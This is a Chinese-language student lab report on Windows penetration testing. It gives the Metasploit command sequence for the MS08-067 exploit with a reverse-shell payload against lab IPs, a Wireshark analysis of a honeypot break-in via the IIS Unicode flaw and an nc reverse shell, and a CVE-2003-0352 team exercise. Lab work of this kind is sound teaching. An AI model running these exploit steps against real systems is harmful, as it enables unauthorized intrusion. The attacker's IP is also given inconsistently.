实验要求
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
- 攻击者使用了什么破解工具进行攻击
- 攻击者如何使用这个破解工具进入并控制了系统
- 攻击者获得系统访问权限后做了什么
- 我们如何防止这样的攻击
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
实验过程
动手实践Metasploit windows attacker
启动msf
msfconsole
使用ms08_067漏洞攻击模块
use exploit/windows/smb/ms08_067_netapi
设置打开反向连接的载荷
set PAYLOAD generic/shell_reverse_tcp
看一下需要设置哪些参数
show options
设置攻击的RHOST以及反向连接的监听ip LHOST。
set RHOST 192.168.235.129
set LHOST 172.27.109.235
设置TARGET为0会自动识别靶机系统,输入exploit进行攻击
set TARGET 0
exploit
这里不知道为啥wsl的kali打不进去
换成虚拟机kali再打一次成功
取证分析实践:解码一次成功的NT系统破解攻击
下载文件后用wireshark打开,通过观察数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机,我们以这两个ip为条件筛选一下。
ip.addr==213.116.251.162 && ip.addr==172.16.1.106
这里面tcp的流量很多,先追踪tcp流看看
在111流中,可以看到攻击者已经可以远程操控靶机了,所以权限的获取应该在这之前,我们找找之前的流
这里的流量,这不就是Unicode漏洞攻击么,Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。这里是利用sql的方式去触发Unicode漏洞
可以在后面的流中看到攻击者利用漏洞做了什么操作
后面的流换了一种方式,%c0%af = /是任意文件读取漏洞,不过执行的操作好像和前面差不多
看这个流程应该是利用sql注入、文件任意读取漏洞去执行cmd,通过nc反向回连获得shell。
后面就是把各种信息填入对应的txt中
接着就是一些提权操作了,比如说把自己的账户填进用户组中
这里可以看到访问者连接到6868端口并获得了权限
从这已经可以看出攻击者知道是蜜罐主机了
团队对抗实践:windows系统远程渗透攻击和分析
使用CVE-2003-0352漏洞攻击win2k。
微软修改dcerpc框架后形成自己的RPC框架来处理进程间的通信。微软的RPC框架在处理TCP/IP信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;此漏洞影响使用RPC框架的DCOM接口,DCOM接口用来处理客户端机器发送给服务器的DCOM对象激活请求,如UNC路径。wireshark抓包分析也可以佐证,攻击机发送两个DCERPC包后便获得了靶机4444端口的访问权限和shell。
遇到的问题
在做第一个任务时wsl的kali无法打入,换成kali虚拟机即可解决。